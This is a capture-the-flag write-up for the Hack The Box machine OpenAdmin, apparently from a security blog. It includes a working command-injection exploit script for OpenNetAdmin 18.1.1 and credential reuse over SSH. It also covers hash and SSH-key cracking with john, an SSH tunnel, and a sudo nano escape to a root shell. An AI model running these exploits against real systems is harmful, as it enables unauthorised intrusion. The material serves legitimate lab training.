Recon

Let’s start off with a basic port enum using nmap, just so we know which services are available.

nmap -A openadmin.htb

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Upon accessing port 80 we are granted with a default Apache2 page.

Surely there must be something else so let’s try and find it.

gobuster dir -u http://openadmin.htb -w /usr/share/wordlists/common.txt

/artwork
/music
/marga
/sierra

All of the paths above lead to a random html template page for different websites that didn’t have anything useful, well, aside from /music which did contain a link pointing to /ona.

Upon accessing the newly discovered path we find ourselves with an OpenNetAdmin application.

After a quick read of the index page we find the app version and determine it’s an outdated version (which is likely prone to vulnerabilities).

You are NOT on the latest release version.
Your version = v18.1.1

Exploitation

Searching on Google for “OpenNetAdmin 18.1.1” exploits leads us to this page, the exploit itself is nothing more than a curl request.

#!/bin/bash

while true; do
 echo -n "www-data@openadmin:~$ "; read cmd
 curl -sd "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "http://openadmin.htb/ona/" | sed -n -e "/BEGIN/,/END/ p" | tail -n2 | head -n1
done

After executing the script we can do some internal poking around, a basic enum leads us to the database settings which includes plain text credentials.

// /opt/ona/www/local/config/database_settings.inc.php

$ona_contexts=array(
  "DEFAULT" => array("databases" => array(0 =>
      array(
        "db_type" => "mysqli",
        "db_host" => "localhost",
        "db_login" => "ona_sys",
        "db_passwd" => "n1nj4W4rri0R!",
        "db_database" => "ona_default",
        "db_debug" => false,
      ),
    ),
    "description" => "Default data context",
    "context_color" => "#D3DBFF",
  ),
);

The parsed credentials are:

ona_sys
n1nj4W4rri0R!

Next, checking /etc/passwd reveals an user named jimmy, maybe he uses the same password for everything…

User

Since the ssh service is running we could try to login as jimmy, so let’s give it a shot.

ssh jimmy@openadmin.htb

Using the credentials found previously worked and we are now ssh’d in.

groups

A quick enum displays our current groups.

jimmy internal

Under /var/www we can find a folder with the internal group perssion, time to enum more.

drwxr-xr-x  6 www-data www-data 4096 Nov 22 15:59 html
drwxrwx---  2 jimmy    internal 4096 Nov 23 17:43 internal
lrwxrwxrwx  1 www-data www-data   12 Nov 21 16:07 ona -> /opt/ona/www

After inspecting each and every file within that folder we find something juicy.

// /var/www/internal/index.php

if ($_POST["username"] == "jimmy" && hash("sha512", $_POST["password"]) == "00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1") {
    $_SESSION["username"] = "jimmy";
    header("Location: /main.php");
}

The snippet above says if we do a POST request with proper credentials we are in (obviously). After using the sha512 hash on this online hash cracking website we find the user’s password.

00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
Revealed

The next step is to figure out where this supposed internal page is running. The following command will print out all the ports that are listening for connections.

ss -lt

LISTEN
127.0.0.1:mysql                   
127.0.0.1:52846

In order to connect to that port we are going to use ssh to create a tunnel for us (since it’s only available internally), forwarding the high port on remote to our local machine.

ssh -L 52846:127.0.0.1:52846 jimmy@10.10.10.171

Now we can access it by navigating to http://localhost:52846.

After logging in using the credentials that we just cracked we can grab joanna’s private key, but there’s a catch, it’s encrypted… Fear not, we can always crack the password.

Save the key as id_rsa on your current working directory.

ssh2john id_rsa > hash.txt

Cracking the generated hash is as simple as:

john -w:/usr/share/wordlists/rockyou.txt hash.txt

joanna
bloodninjas

Great, now that we have the key and password we can ssh in as joanna.

ssh joanna@openadmin.htb -i id_rsa

cat ~/user.txt

c9b2cf07d40807e62af62660f0c81b5f

Privilege Escalation

Time to get root! The first command I always run is sudo -l.

Oh, nice… looks like we can something as sudo.

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

Since nano is a common binary we could check GTFOBins, according to the page we can get a shell as root using:

sudo /bin/nano /opt/priv
^R^X
reset; sh 1>&0 2>&0

Great, it worked!

cat ~/root.txt

2f907ed450b361b2c2bf4e8795d5b561

And that’s it, thanks for reading!